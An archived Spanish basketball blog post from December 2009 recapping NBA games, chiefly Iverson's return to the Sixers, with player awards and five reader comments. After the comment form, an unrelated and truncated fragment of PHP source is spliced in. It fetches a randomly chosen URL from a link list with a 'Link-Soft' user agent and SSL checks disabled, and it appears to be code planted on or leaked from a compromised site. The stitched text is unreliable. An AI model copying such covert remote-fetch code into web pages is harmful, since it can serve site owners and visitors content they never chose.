La Crónica (07/12/09)

08 de December de 2009 por MagicJohnson32

aifansSi usted, lectora, se llamada Inmaculada, dése por felicitada. Si no, igualmente le deseamos un feliz día. Más feliz, si es posible, que el que tuvo Allen Iverson en su tan cacareado regreso a los Sixers. En un partido que bien podría haber sido diseñado por David Stern, los Nuggets visitaban Philadelphia en el reestreno de AI3 con la camiseta con la que se convirtió en el futuro Hall-of-Famer del que ya apenas queda más que el recuerdo. No nos cebemos con él pero es evidente que la presencia de Iverson no parece aportar muchas razones para el optimismo en un equipo cuesta abajo y sin frenos: con la de anoche, los Sixers suman 10 derrotas consecutivas. Eso sí, hacía tiempo que el Wachovia no se llenaba, y ayer lo hizo para recibir a Iverson y ver a su equipo perder ante unos Nuggets comandados por Chauncey Billups.

El partido de la noche, sin embargo, se jugaba lejos de Pensilvania. En Utah, los Jazz, liderados de nuevo por Deron y Boozer, sacaron una sufrida victoria ante los Spurs, que estuvieron a punto de ganar gracias a un espectacular último cuarto de Bonner (16 puntos en el período, 28 en total). El tiro final del pelirrojo se salió prácticamente de dentro y los Spurs vuelven a estar con un 50% en su balance de victorias y derrotas.

alleeLos Jazz superan en la clasificación a los Blazers, que cayeron ante unos Knicks que parecen otros a raíz de la decisión de D’Antoni de cargarse a Nate Robinson. Anoche mostraron su mejor versión en defensa y dejaron en 84 puntos a unos Blazers que tras la lesión de Oden han de replantearse su existencia, empezando por el papel de Andre Miller. La solvencia de Lee y los puntos de Hughes bastaron ante la ineficacia de Portland.

Por último, Durant, Green y Harden lideraron a los Thunder ante los Warriors, en los que Monta Ellis volvió a polarizar todo el juego para lo bueno (31 puntos) y para lo malo (más pérdidas, 9, que rebotes, asistencias, robos y tapones sumados). Lo cierto es que Stephen Curry fue la única ayuda que recibió Ellis. Los Thunder, a lo suyo: 11-9 de balance y octava posición del Oeste.

PREMIOS

MVP: Chauncey Billups recordó al mundo el buen criterio de los Nuggets al intercambiarlo por Iverson con 31 puntos, 8 rebotes y 8 asistencias en la victoria de su equipo sobre los Sixers.

hardendunkEl rookie: El número 3 del pasado draft, James Harden, fue determinante para el triunfo de los Thunder con 26 puntos, 9 rebotes, 5 asistencias y 2 robos.

La sorpresa: Que, en un equipo con Duncan, Parker y Ginóbili, el balón decisivo se lo juegue Bonner es toda una sorpresa. El resultado fue más previsible: Bonner falló y los Spurs perdieron.

La decepción: Richard Jefferson sigue siendo un fantasma en los Spurs (7 puntos y 4 rebotes en 35 minutos anoche). Decepcionó, pese al triunfo de su equipo, Melo Anthony, quien el mismo día que se le concedió el premio como mejor jugador de noviembre en el Oeste se mostró muy gris con 5 de 21 en tiros, 4 rebotes y 1 sola asistencia por 3 pérdidas.

El mayor esfuerzo en vano: El del mejor AI de la liga (Andre Iguodala, se entiende), que anotó 31 puntos con buenos porcentajes y añadió 4 rebotes, 3 robos y 2 asistencias.

Razones para trasnochar

De entre los 8 partidos que se jugarán esta próxima noche destacamos el enfrentamiento a partir de las 2h30 entre Suns y Mavs (¿sigue habiendo morbo cuando Nash juega en Dallas?). Nos apetece ver también qué pueden hacer Jennings ante Rondo (Bucks @ Celtics, 1h30) y Tyreke Evans ante Chris Paul (Kings @ Hornets, 2h00), y si los Grizzlies son capaces de frenar a LeBron (2h00), cosa que dudamos mucho.

Comenta

5 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Hoy a las 4.30 tambien podeis seguir un interesante Clippers-Orlando, aunque kaman sin vitamina D no se como estara.

    Bueno rudolfo con dolores ciaticos, y oden, veremos lo que bajan los portland.

    Bueno la remora bajara sus “numeracos” con su vuelta al juego, que disfruten los fans, pero al resto no nos interesa.

      Citar

  2. Love Denise dice:
    #2

    jejje, yo rémora se lo llamaba a robert horry.
    Para mí, Iverson, mas que una rémora es un dolor de cabezas y un cancer para cualquier vestuario, y una excelente fuente de ingresos para los directivos.

    En cuanto a Portland, las ausencia de Oden pesará y mucho, más que nada, porque se quedan sólo con Pryzbilla de 5, estaría bien traspasar a webster o a outlaw, por algún 5, aunque esto será bastante complicado, a mi, así a bote pronto, no se me ocurre ningun traspaso que pueda ser beneficioso para dos partes.

      Citar

  3. NBA LAKERS BLOG dice:
    #3

    Coincido con lo de A.I… habrá que ver qué tanto puede ayudarle a este equipo sin salida que son los Sixers… “En un partido que bien podría haber sido diseñado por David Stern…” jajaja, tal cual eso…

    Gran trabajo en cada post, de los mejores blogs de NBA que hay… sigue asi! 😉

    Te invito a nuestro blog de los Lakers!

    Un fuerte abrazo!

    –NM–

      Citar

  4. cinedine dice:
    #4

    pues si pararon a lebron, el bueno de zacarias randolph 🙂

      Citar

  5. Txusma dice:
    #5

    No sé yo si hacer que Lebron acabe en 43 puntos, 13 rebotes y 6 asistencias es pararlo 😀 Eso sí,objetivo cumplido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>